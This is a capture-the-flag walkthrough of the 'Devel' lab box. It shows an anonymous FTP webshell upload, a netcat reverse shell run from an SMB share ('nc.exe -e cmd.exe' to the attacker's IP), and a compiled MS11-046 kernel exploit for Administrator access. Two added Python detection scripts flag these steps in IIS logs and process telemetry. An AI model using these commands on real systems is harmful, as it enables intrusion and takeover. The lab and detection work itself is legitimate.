Again, we start with nmap -sC -sV -oA ./devel 10.10.10.5
The scan shows FTP with anonymous login and IIS version 7.5. Hitting the web server just shows us the default IIS screen, so let's check out FTP. First, I try putting a prepackaged aspx webshell onto the target. The one in "/usr/share/webshells/aspx/", which I found via https://highon.coffee/blog/reverse-shell-cheat-sheet/, works beautifully. Then I navigate to it.
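The upload-then-browse sequence above leaves a distinctive trail on the server: an anonymous FTP STOR of a server-side script file, followed by HTTP requests for that same path. The following is an added detection example written for defenders; it is not code from the original write-up. It assumes IIS W3C logs for both the FTP site and the web site (column order is taken from each log's own #Fields: header rather than hard-coded), that the FTP root and web root coincide as they do on this box, and the log lines themselves are constructed for the demonstration.

```python
"""Correlate IIS FTP and IIS web (W3C) logs to flag anonymous uploads of
server-side script files that are later requested over HTTP.

Added detection example, not code from the original write-up. The log text
below is constructed; the column order is read from each log's #Fields:
header exactly as real IIS W3C logs provide it."""

import os
from dataclasses import dataclass

# Extensions IIS executes server-side: an anonymous FTP upload of one of these
# into the web root is the webshell pattern the write-up uses.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".cer", ".soap"}

# Constructed IIS FTP log: the anonymous user stores an .aspx and a .txt.
FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 10.10.14.7 anonymous 10.10.10.5 21 PASS - 230
2024-01-01 10:00:05 10.10.14.7 anonymous 10.10.10.5 21 STOR /cmdasp.aspx 226
2024-01-01 10:00:09 10.10.14.7 anonymous 10.10.10.5 21 STOR /notes.txt 226
"""

# Constructed IIS web log: the uploaded script is then requested over HTTP.
WEB_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:20 10.10.10.5 GET /iisstart.htm - 10.10.14.7 200
2024-01-01 10:00:31 10.10.10.5 GET /cmdasp.aspx - 10.10.14.7 200
2024-01-01 10:00:40 10.10.10.5 POST /cmdasp.aspx - 10.10.14.7 200
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields: names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


@dataclass(frozen=True)
class Finding:
    path: str
    uploader_ip: str
    requester_ips: tuple
    request_methods: tuple


def find_anonymous_webshell_uploads(ftp_text, web_text):
    """Return script files stored by the anonymous FTP user that were later
    requested over HTTP, in the order they appear in the FTP log."""
    uploads = {}  # path -> uploader IP (first STOR wins)
    for row in parse_w3c(ftp_text):
        ext = os.path.splitext(row["cs-uri-stem"])[1].lower()
        if (row["cs-username"].lower() == "anonymous"
                and row["cs-method"] == "STOR"
                and ext in SCRIPT_EXTENSIONS):
            uploads.setdefault(row["cs-uri-stem"], row["c-ip"])

    web_rows = parse_w3c(web_text)
    findings = []
    for path, uploader in uploads.items():
        hits = [r for r in web_rows if r["cs-uri-stem"] == path]
        if hits:  # the upload was exercised through the web server
            findings.append(Finding(
                path, uploader,
                tuple(sorted({h["c-ip"] for h in hits})),
                tuple(h["cs-method"] for h in hits)))
    return findings


if __name__ == "__main__":
    for f in find_anonymous_webshell_uploads(FTP_LOG, WEB_LOG):
        print(f"ALERT: {f.path} stored anonymously from {f.uploader_ip}, "
              f"then requested by {', '.join(f.requester_ips)} "
              f"via {'/'.join(f.request_methods)}")
```

On the constructed input the script reports only /cmdasp.aspx; the .txt upload is ignored because IIS will not execute it. The underlying fix is configuration rather than detection: the anonymous FTP user should never have write access to a directory the web server executes content from.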
I try running nc from the web shell, but get a "This program cannot be run in DOS mode." error. Let's see if I can execute it from a network share via SMB. Impacket has a nice SMB server we can use. I create a new folder "Devel" and copy the Windows binary into it (it is located at /usr/share/windows-resources/binaries/nc.exe). Next, copy smbserver.py from /impacket/examples/smbserver.py into the directory one level above the new Devel folder. Last (for the SMB side anyway), run:
sudo python3 ./smbserver.py share Devel
The first argument is the share name and must match the UNC path used from the target. Set up a netcat listener with "nc -lvnp 9999" and run "\\10.10.X.X\share\nc.exe -e cmd.exe 10.10.X.X 9999" in the webshell. Success! We have an initial shell.
There are a lot of kernel privesc candidates listed there. Fortunately, there are a lot of kernel exploits in SecWiki's GitHub repository: https://github.com/SecWiki/windows-kernel-exploits
Let's skip the tedium and jump right to saying that none of these work. I eventually used Watson (https://github.com/rasta-mouse/Watson) to dig deeper. It comes up with a different set of vulnerabilities. The one that matters is MS11-046.
The C code for MS11-046 is located in "/usr/share/exploitdb/exploits/windows_x86/local/40564.c", and when we look at it, we get some build instructions.
In order to run the compile command from those instructions, i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32, we need to install mingw-w64. Once it is installed and the exploit is compiled, move the resulting .exe into the SMB folder you set up earlier. Final step: this box has been fun but I am ready for it to be over. From the netcat shell you have on the victim PC, run \\YOURIP\share\MS11-046.exe. Congrats, you now have an Administrator shell.
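Both the initial shell and the privilege escalation above share one host-side signature: a descendant of the IIS worker process (w3wp.exe) spawns a command interpreter and then runs binaries straight from a UNC path (nc.exe first, the compiled MS11-046.exe later). The following is an added detection example for defenders, not code from the original write-up. It assumes process-creation telemetry in the shape of Sysmon Event ID 1 fields (Image, CommandLine, ProcessId, ParentProcessId); the field names are Sysmon's, but the events, PIDs and paths are constructed for the demonstration.

```python
"""Flag process-creation events where a descendant of the IIS worker process
executes a binary from a UNC path, or where the worker itself spawns a
command interpreter.

Added detection example, not part of the original write-up. Events are
constructed in the shape of Sysmon Event ID 1; values are invented."""

from dataclasses import dataclass

IIS_WORKER = "w3wp.exe"
INTERPRETERS = {"cmd.exe", "powershell.exe"}

# Constructed process-creation events in chronological order (PIDs arbitrary).
# The chain mirrors the write-up: w3wp -> cmd -> nc.exe (UNC) -> cmd -> exploit (UNC).
EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 4,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "w3wp.exe -ap DefaultAppPool"},
    {"ProcessId": 2300, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe" /c \\10.10.14.7\share\nc.exe -e cmd.exe 10.10.14.7 9999'},
    {"ProcessId": 2310, "ParentProcessId": 2300,
     "Image": r"\\10.10.14.7\share\nc.exe",
     "CommandLine": r"\\10.10.14.7\share\nc.exe -e cmd.exe 10.10.14.7 9999"},
    {"ProcessId": 2320, "ParentProcessId": 2310,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ProcessId": 2400, "ParentProcessId": 2320,
     "Image": r"\\10.10.14.7\share\MS11-046.exe",
     "CommandLine": r"\\10.10.14.7\share\MS11-046.exe"},
    # Benign control: a cmd.exe whose parent is not under IIS at all.
    {"ProcessId": 3000, "ParentProcessId": 800,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]


@dataclass(frozen=True)
class Alert:
    pid: int
    image: str
    reason: str


def basename(path):
    """File name component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_unc(path):
    """True for \\server\share\... style paths."""
    return path.startswith("\\\\")


def analyse(events):
    """Walk each event's ancestry and return alerts for IIS-rooted activity."""
    by_pid = {e["ProcessId"]: e for e in events}

    def descends_from_iis(event):
        seen, pid = set(), event["ParentProcessId"]
        while pid in by_pid and pid not in seen:  # guard against PID reuse loops
            seen.add(pid)
            if basename(by_pid[pid]["Image"]) == IIS_WORKER:
                return True
            pid = by_pid[pid]["ParentProcessId"]
        return False

    alerts = []
    for e in events:
        if not descends_from_iis(e):
            continue
        parent_name = basename(by_pid[e["ParentProcessId"]]["Image"])
        if is_unc(e["Image"]):
            alerts.append(Alert(e["ProcessId"], e["Image"],
                                "binary executed from UNC path under IIS worker"))
        elif basename(e["Image"]) in INTERPRETERS and parent_name == IIS_WORKER:
            alerts.append(Alert(e["ProcessId"], e["Image"],
                                "IIS worker spawned a command interpreter"))
    return alerts


if __name__ == "__main__":
    for a in analyse(EVENTS):
        print(f"ALERT pid={a.pid} {a.reason}: {a.image}")
```

Run against the constructed events it raises three alerts (the cmd.exe spawned by w3wp.exe, then nc.exe and MS11-046.exe executed from the share) and stays silent on the unrelated cmd.exe. The ancestry walk matters because the exploit is several hops below the worker; a rule that only inspects the direct parent would miss it. Blocking outbound SMB from the server and keeping the kernel patched close both halves of this chain.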